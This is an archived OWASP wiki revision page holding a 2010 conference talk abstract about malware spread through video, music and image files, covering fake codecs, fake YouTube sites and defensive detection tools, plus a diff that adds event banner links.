This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

Difference between revisions of "Exploiting the media for fun and profit. Analysis of a new type of web application attacks through media files"

From OWASP
Jump to: navigation, search
(Created page with '== The presentation == rightAs the criminals adapt, they look for new ways to distribute malware. This talk will examine new types of malware th…')
 
(added link header)
Line 1: Line 1:
 +
[[Image:468x60-banner-2010.gif|link=http://www.owasp.org/index.php?title=OWASP_AppSec_DC_2010]]
 +
 +
[https://guest.cvent.com/EVENTS/Register/IdentityConfirmation.aspx?e=d52c6f5f-d568-4e16-b8e0-b5e2bf87ab3a Registration] | [https://resweb.passkey.com/Resweb.do?mode=welcome_gi_new&groupID=2766908 Hotel] | [http://www.dcconvention.com/ Walter E. Washington Convention Center]
 +
<br>
 
== The presentation  ==
 
== The presentation  ==
  

Revision as of 04:56, 21 September 2010

468x60-banner-2010.gif

Registration | Hotel | Walter E. Washington Convention Center

The presentation

Owasp logo normal.jpg
As the criminals adapt, they look for new ways to distribute malware.

This talk will examine new types of malware that spread through online videos, music files, and images. We begin by analyzing media malware trends, and discover that many of the attacks are not targeted and that they are usually reliant on social engineering and blackhat search engine optimization. Next, we provide a taxonomy of different attack vectors. We show that music and video files are commonly infected via URLANDEXIT script injection or DRM licensing abuse, where a user is tricked into downloading a "fake codec". We analyze a growing trend of fake Youtube sites, covering the latest news events. These sites are often advertised through social networking sites, such as Facebook. We demonstrate how easy it is to set up such sites, via a YTFakeCreator toolkit. We then discuss how images of Angelina Jolie have been used to exploit JPEG GDI buffer overflow vulnerability in the past, and how it's still prevalent nowadays. Finally, we discuss some protection mechanisms, ranging from OS configuration changes to disable URLANDEXIT commands, to a custom tool (that will be open-sourced after the talk), which can help easily detect the malware before downloading the entire video. Our tool uses some innovative ideas, such as sequential downloads of the media file, and entropy analysis to detect injected script commands.

The speaker

Speaker bio will be posted shortly.